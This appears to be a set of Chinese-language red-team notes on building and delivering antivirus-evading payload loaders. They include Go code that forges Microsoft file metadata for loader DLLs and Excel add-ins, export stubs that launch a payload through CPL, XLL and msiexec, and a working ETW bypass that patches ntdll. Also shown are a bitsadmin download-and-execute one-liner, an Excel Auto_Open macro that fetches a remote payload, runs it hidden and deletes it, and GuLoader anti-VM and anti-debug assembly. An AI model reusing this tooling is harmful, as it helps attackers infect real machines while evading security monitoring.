vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "telephon.cpl"
vi.StringFileInfo.FileDescription = "Telephony Control Panel"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "telephon.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "telephon.cpl"
}
if name == "datetime" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "timedate.cpl"
vi.StringFileInfo.FileDescription = "Time Date Control Panel Applet"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "timedate.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "timedate.cpl"
}
if name == "winsec" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "wscui.cpl"
vi.StringFileInfo.FileDescription = "Security and Maintenance"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "wscui.cpl.mui"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "wscui.cpl"
}
if name == "Timesheet" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Timesheet.xll "
vi.StringFileInfo.FileDescription = "Timesheet ToolPak"
vi.StringFileInfo.FileVersion = "16.0.10001.10000"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "Timesheet.xll"
vi.FixedFileInfo.ProductVersion.Patch = 10001
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 10001
vi.FixedFileInfo.FileVersion.Build = 10000
vi.StringFileInfo.InternalName = "Timesheet.xll"
}
if name == "Reports" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Reports.xll "
vi.StringFileInfo.FileDescription = "Report ToolPak"
vi.StringFileInfo.FileVersion = "16.0.10001.10000"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "Reports.xll"
vi.FixedFileInfo.ProductVersion.Patch = 10001
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 10001
vi.FixedFileInfo.FileVersion.Build = 10000
vi.StringFileInfo.InternalName = "Reports.xll"
}
if name == "Zoom" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Zoom.xll"
vi.StringFileInfo.FileDescription = "Zoom Addon ToolPak"
vi.StringFileInfo.FileVersion = "16.0.10001.10000"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "Zoom.xll"
vi.FixedFileInfo.ProductVersion.Patch = 10001
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 10001
vi.FixedFileInfo.FileVersion.Build = 10000
vi.StringFileInfo.InternalName = "Zoom.xll"
}
if name == "Updates" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Updates.xll "
vi.StringFileInfo.FileDescription = "Microsoft Update ToolPak"
vi.StringFileInfo.FileVersion = "16.0.10001.10000"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "Updates.xll"
vi.FixedFileInfo.ProductVersion.Patch = 10001
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 10001
vi.FixedFileInfo.FileVersion.Build = 10000
vi.StringFileInfo.InternalName = "Updates.xll"
}
if name == "Calendar" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Calendar.xll "
vi.StringFileInfo.FileDescription = "Calendar ToolPak"
vi.StringFileInfo.FileVersion = "16.0.10001.10000"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "Calendar.xll"
vi.FixedFileInfo.ProductVersion.Patch = 10001
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 10001
vi.FixedFileInfo.FileVersion.Build = 10000
vi.StringFileInfo.InternalName = "Calendar.xll"
}
if name == "Memo" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Memo.xll "
vi.StringFileInfo.FileDescription = "Memo ToolPak"
vi.StringFileInfo.FileVersion = "16.0.10001.10000"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "Memo.xll"
vi.FixedFileInfo.ProductVersion.Patch = 10001
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 10001
vi.FixedFileInfo.FileVersion.Build = 10000
vi.StringFileInfo.InternalName = "Memo.xll"
}
if name == "Desk" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Desk.xll "
vi.StringFileInfo.FileDescription = "Office Desktop ToolPak"
vi.StringFileInfo.FileVersion = "16.0.10001.10000"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "Desk.xll"
vi.FixedFileInfo.ProductVersion.Patch = 10001
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 10001
vi.FixedFileInfo.FileVersion.Build = 10000
vi.StringFileInfo.InternalName = "Desk.xll"
}
if name == "Appwiz" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Appwiz.xll "
vi.StringFileInfo.FileDescription = "Application Installer ToolPak"
vi.StringFileInfo.FileVersion = "16.0.10001.10000"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "Appwiz.xll"
vi.FixedFileInfo.ProductVersion.Patch = 10001
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 10001
vi.FixedFileInfo.FileVersion.Build = 10000
vi.StringFileInfo.InternalName = "Appwiz.xll"
}
}
vi.VarFileInfo.Translation.LangID = goversioninfo.LangID(1033)
vi.VarFileInfo.Translation.CharsetID = goversioninfo.CharsetID(1200)
vi.Build()
vi.Walk()
var archs []string
archs = []string{"amd64"}
for _, item := range archs {
fileout := "resource_windows.syso"
if err := vi.WriteSyso(fileout, item); err != nil {
log.Printf("Error writing syso: %v", err)
os.Exit(3)
}
}
fmt.Println("[+] Created Embedded Resource File With " + name + "'s Properties")
return name
}
加载方式
- Control Panel – 通过dll导出特定的名称
CPlApplet以及文件扩展名.cpl,它将生成一个控制面板进程(rundll32.exe),并且该加载程序将被加载到内存中。- https://wooyun.js.org/drops/CPL%E6%96%87%E4%BB%B6%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D.html
- 有导出函数时它会停止运行(x64位下不显示停止运行),然后显示不兼容信息,会显示dll版本,编译时最好连版本一起编译
- 其他方式运行: rundll32 shell32.dll,Control_RunDLL <文件名> 、control <文件名>
- 可编写vbs或js脚本调用
#!shell
' Opens the named Control Panel item through the Shell.Application COM object.
Dim shellApp
Set shellApp = CreateObject("Shell.Application")
shellApp.ControlPanelItem("test.cpl")
!javascript
// Same call as the VBScript variant above: Shell.Application.ControlPanelItem on an absolute path.
var shellApp = new ActiveXObject("Shell.Application");
shellApp.ControlPanelItem("c:\\test\\test.cpl");
- WScript
// DllRegisterServer is exported via cgo (the enclosing file must import "C")
// as the COM-server registration entry point of the built DLL. It only
// forwards to Start, which is defined elsewhere in the file.
//export DllRegisterServer
func DllRegisterServer() {
Start()
}
// DllGetClassObject is exported via cgo as the COM class-factory entry point.
// It ignores the usual (rclsid, riid, ppv) contract and simply forwards to
// Start, defined elsewhere in the file.
//export DllGetClassObject
func DllGetClassObject() {
Start()
}
// DllUnregisterServer is exported via cgo as the COM-server unregistration
// entry point; like the other exports it only forwards to Start.
//export DllUnregisterServer
func DllUnregisterServer() {
Start()
}
- Excel – 生成XLL文件,它们是基于Excel的DLL文件,当加载到Excel中时将执行加载程序。
// xlAutoOpen is the entry point Excel calls when an XLL add-in is loaded
// (exported via cgo; the file must import "C"). It forwards to Start,
// defined elsewhere in the file.
//export xlAutoOpen
func xlAutoOpen() {
Start()
}
- 参考
- https://zhuanlan.zhihu.com/p/28355582
- https://paper.seebug.org/1591/
- 打开后会显示没有数字签名
- 没加签名只是不可信任,还可以点击运行,加了签名后(签名不被信任),直接就加载失败了
- Msiexec - Spawns a hidden MSIExec process that will load the DLL into memory and execute the shellcode.
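// DllRegisterServer is the export invoked for registration (the original
// note "/y" refers to the `msiexec /y <dll>` switch). A cgo export name must
// be a bare identifier: `//export DllRegisterServer /y` would make cgo emit an
// invalid exported symbol, so the switch is recorded here as a comment.
// Forwards to Start, defined elsewhere in the file.
//export DllRegisterServer
func DllRegisterServer() {
	Start()
}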
// DllGetClassObject is exported via cgo as the COM class-factory entry point
// and forwards to Start, defined elsewhere in the file.
//export DllGetClassObject
func DllGetClassObject() {
Start()
}
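// DllUnregisterServer is the export invoked for unregistration (the original
// note "/z" refers to the `msiexec /z <dll>` switch). The switch cannot be part
// of the cgo directive — `//export DllUnregisterServer /z` yields an invalid
// exported symbol — so it lives in this comment instead.
// Forwards to Start, defined elsewhere in the file.
//export DllUnregisterServer
func DllUnregisterServer() {
	Start()
}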
一些白加黑参考
- http://www.hackdig.com/04/hack-331458.htm
- https://lolbas-project.github.io/#/exe
ETW Bypass
// Lazily resolved procedure addresses: kernel32!WriteProcessMemory plus the
// three ntdll ETW exports whose entry bytes ETW() overwrites.
var (
	procWriteProcessMemory      = syscall.NewLazyDLL("kernel32.dll").NewProc("WriteProcessMemory")
	procEtwNotificationRegister = syscall.NewLazyDLL("ntdll.dll").NewProc("EtwNotificationRegister")
	procEtwEventRegister        = syscall.NewLazyDLL("ntdll.dll").NewProc("EtwEventRegister")
	procEtwEventWriteFull       = syscall.NewLazyDLL("ntdll.dll").NewProc("EtwEventWriteFull")
)
// errERROR_IO_PENDING is the shared error value for ERROR_IO_PENDING, so
// callers can compare with == instead of allocating a new Errno each time.
var errERROR_IO_PENDING error = syscall.Errno(errnoERROR_IO_PENDING)
// errnoERROR_IO_PENDING is the Win32 ERROR_IO_PENDING code (997).
const errnoERROR_IO_PENDING = 997
// errnoErr maps a raw Windows errno to the error value callers compare against:
// 0 becomes nil, ERROR_IO_PENDING becomes the shared errERROR_IO_PENDING, and
// anything else is returned unchanged as the syscall.Errno itself.
func errnoErr(e syscall.Errno) error {
	if e == 0 {
		return nil
	}
	if e == errnoERROR_IO_PENDING {
		return errERROR_IO_PENDING
	}
	return e
}
// WriteProcessMemory calls kernel32!WriteProcessMemory through the lazily
// resolved procWriteProcessMemory. In the style of generated Windows syscall
// wrappers, a zero BOOL result is turned into an error: the Win32 last-error
// code when one was reported, otherwise syscall.EINVAL. A non-zero result
// yields a nil error.
func WriteProcessMemory(hProcess uintptr, lpBaseAddress uintptr, lpBuffer *byte, nSize uintptr, lpNumberOfBytesWritten *uintptr) (err error) {
	ret, _, callErr := syscall.Syscall6(
		procWriteProcessMemory.Addr(), 5,
		hProcess, lpBaseAddress,
		uintptr(unsafe.Pointer(lpBuffer)), nSize,
		uintptr(unsafe.Pointer(lpNumberOfBytesWritten)), 0,
	)
	if ret != 0 {
		return nil
	}
	if callErr == 0 {
		return syscall.EINVAL
	}
	return errnoErr(callErr)
}
// ETW overwrites the first bytes of three ntdll ETW exports in the current
// process so that each returns immediately.
//
// What the visible code does:
//   - the handle 0xffffffffffffffff is (HANDLE)-1, the current-process
//     pseudo-handle, so every write lands in this process's own ntdll mapping;
//   - "4833C0C3" is the x64 encoding of `xor rax, rax ; ret` (4 bytes), so a
//     patched export reports success without doing anything;
//   - the same constant is re-decoded on every loop iteration.
//
// Defender notes: only these three entry points inside this process are
// modified; nothing outside the process is touched. The patch is visible by
// comparing the in-memory prologue of these exports with the on-disk ntdll
// image, and the self-directed WriteProcessMemory into a loaded module is
// itself an observable event.
func ETW() {
handle := uintptr(0xffffffffffffffff) // GetCurrentProcess() pseudo-handle
dataAddr := []uintptr{procEtwNotificationRegister.Addr(), procEtwEventRegister.Addr(), procEtwEventWriteFull.Addr()}
for i, _ := range dataAddr {
data, _ := hex.DecodeString("4833C0C3") // xor rax, rax ; ret
var nLength uintptr
datalength := len(data)
WriteProcessMemory(handle, dataAddr[i], &data[0], uintptr(uint32(datalength)), &nLength)
}
}
自签名步骤
- openssl genrsa -out privkey.pem 512 // 生成rsa密钥
- openssl req -new -x509 -days 3650 -key privkey.pem -out server.crt -subj "/C=CN/ST=mykey/L=mykey/O=mykey/OU=mykey/CN=domain1/CN=domain2/CN=domain3" // 生成证书
- openssl pkcs12 -export -out server.pfx -inkey privkey.pem -in server.crt // 生成pfx文件
- osslsigncode sign -pkcs12 server.pfx -in Dll1.dll -out Dll2.dll -pass 123 // 将原dll签名
Delivery
- hta
- hta可以远程下载执行,可以伪装成lnk文件
- 参考 https://www.anquanke.com/post/id/210404
- 调用mshta时,后缀名可以是任意后缀,但有的后缀(如 js、txt 这类常用后缀)打开后就只是一个窗口。用法: mshta.exe url/文件绝对位置
<!-- Minimal HTA: collapses its own window to 0x0, shows a WScript.Shell popup, then closes. -->
<html>
<head>
</head>
<body>
<script language="javascript">
window.resizeTo(0, 0);
var wsh = new ActiveXObject("WScript.Shell");
wsh.Popup("text");
window.close();
</script>
</body>
</html>
- bitsadmin组合
fmt.Println("bitsadmin /transfer " + outFile + " " + URL + outFile + " %APPDATA%\\" + outFile + " & cscript //E: JScript %APPDATA%\\" + outFile + " & timeout 20 & del %APPDATA%\\" + outFile + "")
- Macro
- Excel macro that will download, execute and remove the payload
' Auto_Open runs when the workbook opens. This is a Go text/template: every
' {{.Variables.*}} token is substituted before the result is valid VBA.
' Flow as written: XMLHTTP GET of {{.Variables.URL}}{{.Variables.outFile}} ->
' ADODB.Stream SaveToFile under %AppData%\Microsoft\Excel\ -> run the saved
' file with cscript //E:jscript via a WScript.Shell obtained from a new COM
' instance (GetObject "new:<CLSID>") -> wait -> Kill the file.
' Detection surface: Auto_Open + Microsoft.XMLHTTP + ADODB.Stream in one
' module, a cscript.exe child whose parent is an Office process, and a
' write/delete pair for the same path in %AppData%\Microsoft\Excel.
' NOTE(review): {{.Variables.output}} and {{.Variables.obj}} are never Dim'd
' (relies on the module not using Option Explicit); {{.Variables.t}} is unused.
Sub Auto_Open()
Dim {{.Variables.pathOfFile}} As String
Dim {{.Variables.Full}} As String
Dim {{.Variables.t}} As String
{{.Variables.pathOfFile}} = Environ("AppData") & "\Microsoft\Excel\" ' download directory
VBA.ChDir {{.Variables.pathOfFile}}
Dim {{.Variables.remoteFile}} As String
Dim {{.Variables.storeIn}} As String
Dim {{.Variables.HTTPReq}} As Object
{{.Variables.remoteFile}} = "{{.Variables.URL}}{{.Variables.outFile}}"
{{.Variables.storeIn}} = "{{.Variables.outFile}}"
Set {{.Variables.HTTPReq}} = CreateObject("Microsoft.XMLHTTP")
{{.Variables.HTTPReq}}.Open "GET", {{.Variables.remoteFile}}, False ' synchronous request
{{.Variables.HTTPReq}}.send
If {{.Variables.HTTPReq}}.Status = 200 Then
Set {{.Variables.output}} = CreateObject("ADODB.Stream")
{{.Variables.output}}.Open
{{.Variables.output}}.Type = 1 ' adTypeBinary
{{.Variables.output}}.Write {{.Variables.HTTPReq}}.responseBody
{{.Variables.output}}.SaveToFile {{.Variables.storeIn}}, 2 ' adSaveCreateOverWrite, relative to the ChDir above
{{.Variables.output}}.Close
End If
{{.Variables.Full}} = {{.Variables.pathOfFile}} & {{.Variables.storeIn}}
Set {{.Variables.obj}} = GetObject("new:0006F03A-0000-0000-C000-000000000046") ' new COM instance by CLSID (presumably Excel.Application - confirm)
{{.Variables.obj}}.CreateObject("WScript.Shell").Run("c" & "s" & "c" & "r" & "i" & "p" & "t" & " //E:jscript " & {{.Variables.Full}}), 0 ' "cscript" spelled by concatenation; window style 0 = hidden
{{.Variables.sleep}} ' busy-wait (see the Sub below) before deleting the file
Kill {{.Variables.Full}}
End Sub
' Busy-waits about 30 seconds by pumping DoEvents until the deadline passes,
' logging the start and end timestamps to the Immediate window.
Sub {{.Variables.sleep}}()
Dim deadline As Variant
Debug.Print "Start " & Now
deadline = Now + TimeValue("00:00:30")
Do Until Now >= deadline
DoEvents
Loop
Debug.Print "End " & Now
End Sub
- 宏更多可参考
- https://cloud.tencent.com/developer/article/1761344 Office如何快速进行宏免杀
- https://uknowsec.cn/posts/notes/%E5%8A%A0%E8%BD%BD%E8%BF%9C%E7%A8%8BXSL%E6%96%87%E4%BB%B6%E7%9A%84%E5%AE%8F%E5%85%8D%E6%9D%80%E6%96%B9%E6%B3%95.html
关联 #10
[x] 学习 https://github.com/hasherezade/transacted_hollowing 手法

- https://blog.malwarebytes.com/threat-analysis/2018/08/process-doppelganging-meets-process-hollowing_osiris/
- 第二阶段的加载器,其普通入口点只执行一些无关的简单操作,用来误导研究人员
- 执行通过修补入口点重定向到核心代码
[x] https://mp.weixin.qq.com/s/-o1OKRDoa0E8PKe3y3x-dQ
沙盒识别
- wmi获取系统信息

- 获取cpu温度
- 不完全可行,有些物理机不支持
- cpu数量,通过peb 0x64位置
- 检测网络地址

GetTickCount返回指定值的时候才能够继续,这样在某种程度上说就达到了超时效果,而且这样的片段有好几个,有意思的是指定的返回值在经过简单的计算之后会被用来拼装成要获取的函数名称字串。
- 设定在指定时间运行,否则程序异常出错
- https://github.com/med0x2e/GadgetToJScript
- 将c#转换为js vbs代码
- 参考 https://blog.csdn.net/Snake_74/article/details/105295926
- https://github.com/mdsecactivebreach/CACTUSTORCH
- c#程序集转换为js hta的方式
通过GetTickCount - Sleep - GetTickCount反调试
沙盒钩子检测
- https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/playing-with-guloader-anti-vm-techniques-malware/
_ANTI_HOOK
; Anti-hook trampoline from the GuLoader analysis quoted above (32-bit code).
; EAX = source address of the stub to copy (per the note below, the ntdll
; NtAllocateVirtualMemory stub); EBX = destination buffer, taken from the stack
; by the pop below (the call site that pushes it is not in this listing).
; Analyst note: after the copy the system-call stub executes from a buffer
; outside the ntdll image, which is itself a distinguishing signal.
fnop                                ; fnop/clc/cld appear to be no-effect filler
pop ebx
cld
cmp dword ptr [ebx], 0              ; destination already populated? then skip the copy
jnz short _jmp_copied_NtAllocateVirtualMemory
clc
xor ecx, ecx                        ; ECX = byte offset into both buffers
_copy:
clc
push dword ptr [eax+ecx]            ; copy one dword [eax+ecx] -> [ebx+ecx]
pop dword ptr [ebx+ecx]
add ecx, 4
cmp ecx, 18h                        ; 0x18 bytes = six dwords = the full stub (see next listing)
jnz short _copy
cld
_jmp_copied_NtAllocateVirtualMemory:
fnop
jmp ebx                             ; run the private copy instead of the original export
_ANTI_HOOK
随着push dword ptr [eax+ecx]和pop dword ptr [ebx+ecx]NtAllocateVirtualMemory 函数被复制到retn 0x18
ntdll_NtAllocateVirtualMemory
; The 32-bit (WoW64) ntdll stub that _ANTI_HOOK copies. Its encoded length is
; 5+2+4+7+3+3 = 24 = 0x18 bytes, matching the copy loop bound above.
arg_0= byte ptr 4
mov eax, 15h                        ; system service number (varies between Windows builds)
xor ecx, ecx
lea edx, [esp+arg_0]                ; EDX -> first stack argument
call large dword ptr fs:0C0h        ; WoW64 system-call transition through the TEB (fs:[0xC0])
add esp, 4
retn 18h                            ; callee pops six dword arguments (0x18 bytes)
然后它跳转到复制函数的代码,使用jmp ebx并执行它。
如果它在没有钩子的环境中运行,该函数将被正确执行。但是如果函数中有一个钩子,并且这个钩子进行了相对跳转,比如带有操作码E9(比如布谷鸟监视器执行的那些),当已经复制到另一个位置的函数被执行时,它会跳转到未知位置,会发生异常,导致程序突然终止。
虚拟机检测
GuLoader 使用以下算法来检测它是否在虚拟机内:
_VM_DETECT proc near
; Timing-based VM check (GuLoader). Calls _RDTSC_OPS until 0x186A0 samples
; greater than 0x32 have been accumulated in EDI, then accepts the host only if
; the sum is below 0x68E7780; returns that sum in EAX. There is no exit path
; for a "slow" machine: on a VM whose RDTSC is not modified this never returns.
cld
_VM_DETECT_START:
fnop
xor edi, edi                        ; EDI = running sum of accepted _RDTSC_OPS results
nop
mov ecx, 186A0h                     ; ECX = accepted samples still needed
cld
nop
_VM_DETECT_CONTINUE:
push ecx
call _RDTSC_OPS                     ; EDX = cycle delta measured around one CPUID
pop ecx
cmp edx, 32h
jl short _VM_DETECT_CONTINUE        ; sample < 0x32: retry without counting it
add edi, edx
dec ecx
cmp ecx, 0
jnz short _VM_DETECT_CONTINUE
cmp edi, 0
jl short _VM_DETECT_START           ; sum went negative (wrapped): start over
cmp edi, 68E7780h
jge short _VM_DETECT_START          ; total too large: treated as virtualised, start over
mov eax, edi
retn
_VM_DETECT endp
-
值 0x186A0 存储在 ECX 中。该值表示 EDI 累加 _RDTSC_OPS 运算结果的次数: 只要运算结果大于 0x32,函数的结果就会递增。
-
之后它会调用_RDTSC_OPS 函数,后面会详细解释。现在,只需要知道这个函数会返回一个大于 0 的值。
-
然后检查该值是否大于 0x32。如果是,它会将结果累加到 EDI 寄存器中并递减 ECX。否则它返回到 _VM_DETECT_CONTINUE 再次调用 _RDTSC_OPS。需要注意的是,如果此时 _RDTSC_OPS 返回的值连续大于 0 但小于 0x32,程序将一直处于无限循环。
-
这将一直进行直到 ECX 为 0,因此函数的结果就是 EDI 经过 0x186A0 次 add edi, edx 运算后的累加值。
-
最后,它将检查这些增量的累加结果是否大于或等于 0x68E7780。结果必须更低才能通过虚拟机检查;如果不是,则执行将返回到 _VM_DETECT_START。需要强调的是,在没有对 RDTSC 做任何修改或挂钩的虚拟机中,程序将一直停留在无限循环中。
基本上,恶意软件开发人员估计,由于在虚拟化环境中执行 RDTSC 会产生额外开销,_RDTSC_OPS 函数执行 0x186A0 次后返回值的累加结果将高于 0x68E7780。如果人为地将 RDTSC 的返回值降低到 0x32 以下以试图绕过类似技术,则分析将永远停留在此 Anti-VM 检查中。
_RDTSC_OPS 函数
GuLoader使用以下算法获取两次RDTSC调用之间的执行时间,CPUID EAX=1如下图所示:
_RDTSC_OPS
; Measures the cycle count spent around one CPUID(EAX=1) — an instruction that
; causes a VM exit under a hypervisor — and returns the delta in EDX. Repeats
; the measurement until the delta is positive.
lfence
rdtsc                               ; EDX:EAX = timestamp counter, first sample
lfence
shl edx, 20h                        ; NOTE: 32-bit shift counts are masked to 5 bits, so this shifts by 0 and EDX is unchanged
or edx, eax                         ; combine "high" and "low" halves of the first sample
mov esi, edx                        ; keep the first sample in ESI
pusha
mov eax, 1
cpuid                               ; CPUID leaf 1
bt ecx, 1Fh                         ; CPUID.1:ECX bit 31 = hypervisor-present flag
jb short $+2                        ; falls through to the next instruction either way; the bit is not acted on
popa
lfence
rdtsc                               ; second sample
lfence
shl edx, 20h
or edx, eax
sub edx, esi                        ; delta = second sample - first sample
cmp edx, 0
jle short _RDTSC_OPS                ; non-positive delta: measure again
retn
_RDTSC_OPS
该算法执行以下操作:
1. 首先通过 RDTSC 获得经过的时间,低位部分在 EAX,高位部分在 EDX。
2. 对高低两部分进行 OR 运算,并将结果保存在 ESI 中。
3. 它以 EAX=1 调用 CPUID,然后通过 bt ecx, 1Fh 指令检查自己是否运行在虚拟机中。然而,这个检查的结果并不重要,因为调用 CPUID 的真正目的是生成 VM 退出,导致管理程序将执行传递给虚拟机管理器。由于这一调用在虚拟机中比在物理机中花费更多时间,因此可以据此区分是否运行在虚拟机中。
4. 再次调用 RDTSC,并获取 EAX(低位)和 EDX(高位)中的时间。
5. 对高低两部分进行 OR 运算,并减去先前存储在 ESI 中的结果。
6. 如果结果大于 0(正常执行中应如此),函数将返回 EDX 中的结果,否则将返回到函数的开头。需要强调的是,在某些沙箱中,样本此时可能会被锁定在无限循环中,这取决于沙箱处理 RDTSC 的方式。
DJB2散列 计算函数hash
反沙盒/反仿真 GuLoader 还会检查应用程序窗口的数量以检测分析环境。此检查使用 EnumWindows 函数枚举并计数屏幕上的所有顶级窗口。如果窗口数小于 12,则恶意软件以自己的进程句柄为参数调用 TerminateProcess 终止自身。这样做可能是为了逃避沙箱或模拟器环境。
Anti-Attach:修补 DbgBreakPoint 和 DbgUiRemoteBreakin。Windows API 函数 DbgBreakPoint 和 DbgUiRemoteBreakin 会在调试器附加到正在运行的进程时被调用。shellcode 通过将 DbgBreakPoint 中的 INT3 操作码替换为 NOP(“无操作”,什么都不做),并用一个虚拟调用(导致崩溃)替换 DbgUiRemoteBreakin 的前几个字节,来修补这两个 API。
- https://www.crowdstrike.com/blog/guloader-malware-analysis/
- https://blog.morphisec.com/guloader-the-rat-downloader
它从检测代码执行加速的常见反沙盒技术开始:它获取 Sleep 函数调用前后的本地时间,并检查 Sleep 是否被跳过。
然后加载程序收集受害者计算机上的数据,包括主机名、操作系统名称和版本、系统类型(32/64 位)、用户名、网络适配器的 MAC 地址。它还查询 WMI 以获取防病毒信息。
滥用windows callback执行shellcode
- 作者提供了一种搜索方法,快速搜索具有callback的函数
- http://ropgadget.com/posts/abusing_win_functions.html
待学习,系统调用
- CSV Injection https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CSV%20Injection/README.md
- AMSI Bypass https://github.com/ssswake/payload/blob/aa4086b854/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md
- Mimikatz整理 https://github.com/ssswake/payload/blob/aa4086b854/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md
shellcode只运行一次:主程序通过dns,http远程获取密钥,通过密钥解密shellcode执行,shellcode包含反调试和反沙箱代码,运行后再次根据密钥解密真正执行的shellcode,通过各种方式注入执行。
免杀的ABU方向 #11
反沙箱
